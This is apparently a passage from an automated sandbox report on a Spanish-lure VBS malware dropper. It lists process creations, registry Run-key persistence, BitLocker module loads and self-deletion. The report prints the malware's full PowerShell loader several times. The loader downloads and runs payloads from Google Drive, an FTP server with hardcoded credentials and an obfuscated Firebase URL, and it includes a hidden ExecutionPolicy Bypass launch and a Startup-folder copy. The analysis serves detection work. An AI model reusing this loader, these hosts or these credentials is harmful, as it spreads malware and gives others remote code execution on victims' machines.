'2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848C91B15 pushad ; iretd	2_2_00007FF848C91B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848C900BD pushad ; iretd	2_2_00007FF848C900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848C82313 pushad ; iretd	4_2_00007FF848C8232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848C800BD pushad ; iretd	4_2_00007FF848C800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848D523A3 push 8B485F92h; iretd	4_2_00007FF848D523AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848D5235D push 8B485F92h; retf	4_2_00007FF848D52365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848B7D2A5 pushad ; iretd	5_2_00007FF848B7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C985BD push ebx; ret	5_2_00007FF848C985DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C995DF pushad ; retf	5_2_00007FF848C99621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C985FA push ebx; ret	5_2_00007FF848C9861A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C99623 pushad ; retf	5_2_00007FF848C99621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C9861D push ebx; ret	5_2_00007FF848C9861A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C92313 pushad ; iretd	5_2_00007FF848C9232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C900BD pushad ; iretd	5_2_00007FF848C900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848C983FB push ebx; ret	5_2_00007FF848C9843A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848B4D2A5 pushad ; iretd	6_2_00007FF848B4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C685F4 push ebx; ret	6_2_00007FF848C685FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C685DB push ebx; ret	6_2_00007FF848C6863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C68574 push ebx; ret	6_2_00007FF848C6863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C68524 push ebx; ret	6_2_00007FF848C6863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C6962D pushad ; retf	6_2_00007FF848C69641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C600BD pushad ; iretd	6_2_00007FF848C600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C6849B push ebx; ret	6_2_00007FF848C6863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FF848C683FC push ebx; ret	6_2_00007FF848C6845A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848C522D0 pushad ; iretd	8_2_00007FF848C5232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848C500BD pushad ; iretd	8_2_00007FF848C500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF848C800BD pushad ; iretd	12_2_00007FF848C800C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_05EA0021 push edx; retf	15_2_05EA001D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848C506CF push ds; iretd	18_2_00007FF848C506DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848C500BD pushad ; iretd	18_2_00007FF848C500C1

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"			Jump to behavior

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
